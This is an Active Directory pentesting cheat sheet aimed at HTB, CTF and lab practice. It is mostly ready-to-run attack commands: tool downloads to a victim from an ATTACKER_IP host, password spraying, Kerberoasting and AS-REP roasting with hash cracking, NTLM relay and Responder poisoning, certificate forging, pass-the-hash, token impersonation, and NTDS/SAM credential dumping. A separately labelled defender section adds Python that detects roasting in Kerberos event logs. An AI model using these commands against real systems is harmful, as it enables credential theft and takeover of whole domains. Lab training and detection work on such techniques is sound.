
Active Directory Pentesting Cheatsheet

A practical cheat sheet for fast Active Directory enumeration and exploitation during HTB, CTFs and offensive security labs.


0. ESSENTIAL AD PENTESTING RESOURCES & TOOLS

Before deep manual enumeration, these core tools give fast, high-value visibility into AD attack paths.

Core Tools & Frameworks


0.1 QUICK FILE TRANSFER COMMANDS (upload tools to target)

Attacker: Host files


python3 -m http.server 8000

Victim: Download tools


certutil -urlcache -f http://ATTACKER_IP:8000/SharpHound.exe SharpHound.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/PowerView.ps1','PowerView.ps1')"

certutil -urlcache -f http://ATTACKER_IP:8000/Certify.exe Certify.exe

1. BASIC ENUMERATION

Identify Domain Information


nltest /dsgetdc:<domain>
whoami /groups
systeminfo | findstr /i "domain"

Network Shares


net view \\<DC>
net share
smbclient -L //<DC> -U '<user>'

Domain Users


net user /domain

Domain Groups


net group /domain

Domain Controllers


nltest /dclist:<domain>

2. ENUMERATION USING IMPACKET

Get users via LDAP


ldapsearch -H ldap://<DC> -x -b "dc=corp,dc=local"

impacket-GetADUsers


GetADUsers.py corp.local/user:password -all

List SMB shares


smbclient -L //<DC> -U 'corp.local/user%password'

Dump user info


rpcclient -U "" -N <DC> -c "enumdomusers"

3. PASSWORD SPRAYING

CME spraying


crackmapexec smb <CIDR> -u users.txt -p 'Password123!'

Kerbrute user enumeration


kerbrute userenum -d corp.local users.txt --dc <DC_IP>

4. KERBEROS-BASED ATTACKS

4.1 AS-REP Roasting (No Pre-auth Required)

Find vulnerable accounts:


GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip <DC_IP>

Hash format: $krb5asrep$...

Crack:


hashcat -m 18200 hash.txt wordlist

4.2 Kerberoasting (Service Tickets)

Request service tickets using Impacket:


GetUserSPNs.py corp.local/user:password -dc-ip <DC_IP> -request -outputfile kerberoast.txt

Crack:


hashcat -m 13100 kerberoast.txt wordlist
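Defender-side counterpart to 4.1 and 4.2, added here as an example and not part of the original cheat sheet: the roasting requests above leave RC4 (0x17) ticket requests in the DC's Security log. The records below are constructed sample events, not real telemetry; field names follow the 4768/4769 event XML.

```python
# Added example: flag Kerberoasting / AS-REP roasting indicators in Windows
# Security events 4769 (TGS request) and 4768 (TGT request).
# Encryption types: 0x17 = RC4-HMAC (crackable), 0x12 = AES256.
RC4 = "0x17"

SAMPLE_EVENTS = [  # constructed sample records, not real telemetry
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.51"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "carol", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.52", "Status": "0x0"},
]


def kerberoast_suspects(events, threshold=3):
    """(user, source IP) pairs requesting >= threshold RC4 service tickets for
    distinct non-computer, non-krbtgt SPNs: the footprint of GetUserSPNs -request."""
    per_requester = {}
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and the KDC itself are not roastable targets
        per_requester.setdefault((e["TargetUserName"], e["IpAddress"]), set()).add(svc)
    return {k: sorted(v) for k, v in per_requester.items() if len(v) >= threshold}


def asrep_roast_suspects(events):
    """Accounts whose 4768 shows PreAuthType 0 and a successful RC4 TGT: an account
    without pre-auth has just handed out a crackable AS-REP (GetNPUsers)."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == "0"
                   and e["TicketEncryptionType"] == RC4 and e.get("Status") == "0x0"})


if __name__ == "__main__":
    print(kerberoast_suspects(SAMPLE_EVENTS))
    print(asrep_roast_suspects(SAMPLE_EVENTS))
```

The mitigation the logic points at: move service accounts to AES-only, set long random passwords or gMSAs for SPN accounts, and clear "Do not require Kerberos preauthentication" wherever it is set.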

4.3 Pass-the-Ticket

List tickets:


klist

Use ticket:


export KRB5CCNAME=/tmp/krb.ccache
psexec.py -k -no-pass corp.local/<user>@<host>

5. NTLM RELAY & LLMNR/NetBIOS POISONING

Start Responder


responder -I eth0

Useful in flat networks where LLMNR/NBNS is enabled.

NTLM Relay (to LDAP; a domain dump into the loot directory is the default action)


ntlmrelayx.py -t ldap://<DC_IP>

Relay to SMB (dumps the target's local SAM by default)


ntlmrelayx.py -t smb://<TARGET> -smb2support

6. SMB & RPC ATTACKS

Null sessions


rpcclient -U "" -N <DC_IP>

Enumerate groups


rpcclient -U "" -N <DC_IP> -c "enumdomgroups"

SMB exec


psexec.py corp.local/user:password@<host>

7. ABUSING ACTIVE DIRECTORY PERMISSIONS

Check ACLs with PowerView


Import-Module .\PowerView.ps1
Get-ObjectACL -Identity <user/group>

Find abusable rights on the object (for example ForceChangePassword, used below).

Reset password via ForceChangePassword


Set-DomainUserPassword -Identity victimuser -AccountPassword (ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force)

8. BLOODHOUND QUICK USAGE

Collect Data


SharpHound.exe -c All

Upload to BloodHound GUI

Analyse typical attack paths with the built-in queries.


9. AD CS (CERTIFICATE SERVICES) ATTACKS

Enumerate AD CS


Certify.exe find

Request certificate for authentication


Certify.exe request /ca:<CA_NAME> /template:<TEMPLATE>

Forge certificate (ESC4 / ESC8)


ForgeCert.exe --template <template> --subject "CN=Administrator" ...

Authenticate with certificate


Rubeus.exe asktgt /user:Administrator /certificate:<cert.pfx>

10. PASS-THE-HASH (PTH)

Using CME


crackmapexec smb <TARGET> -u admin -H <NTLM>

Using Impacket


psexec.py corp.local/Administrator@<HOST> -hashes <LMHASH>:<NTHASH>

11. TOKEN IMPERSONATION (WINDOWS)

List tokens


whoami /priv

Look for: SeImpersonatePrivilege (required by PrintSpoofer below).

Exploit:


PrintSpoofer.exe -i -c cmd

12. DUMPING CREDENTIALS (NTDS, SAM, LSA)

NTDS Dump via SecretsDump


secretsdump.py corp.local/Administrator@<DC_IP>

Extract SAM & SYSTEM


reg save HKLM\SAM SAM
reg save HKLM\SYSTEM SYSTEM
secretsdump.py -sam SAM -system SYSTEM LOCAL

Final Notes

This cheat sheet centralizes the core Active Directory pentesting techniques and is suitable for HTB, CTFs, OSCP prep and controlled AD pentest labs.
